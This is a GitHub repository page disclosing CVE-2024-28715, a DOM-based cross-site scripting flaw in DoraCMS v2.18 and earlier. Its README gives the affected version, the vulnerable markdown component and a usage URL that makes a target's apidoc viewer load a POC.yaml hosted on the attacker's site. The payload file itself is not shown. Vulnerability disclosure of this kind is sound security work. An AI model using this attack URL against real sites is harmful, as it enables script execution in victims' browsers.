Skip to content

Lq0ne/CVE-2024-28715

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
POC.yaml
POC.yaml
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-28715

[CVE ID]

CVE-2024-28715

[PRODUCT]

DoraCMS

[Version]

DoraCMS v2.18 and before

[PROBLEM TYPE]

Dom-based XSS.

[DESCRIPTION]

Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint.

[Usage]

https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published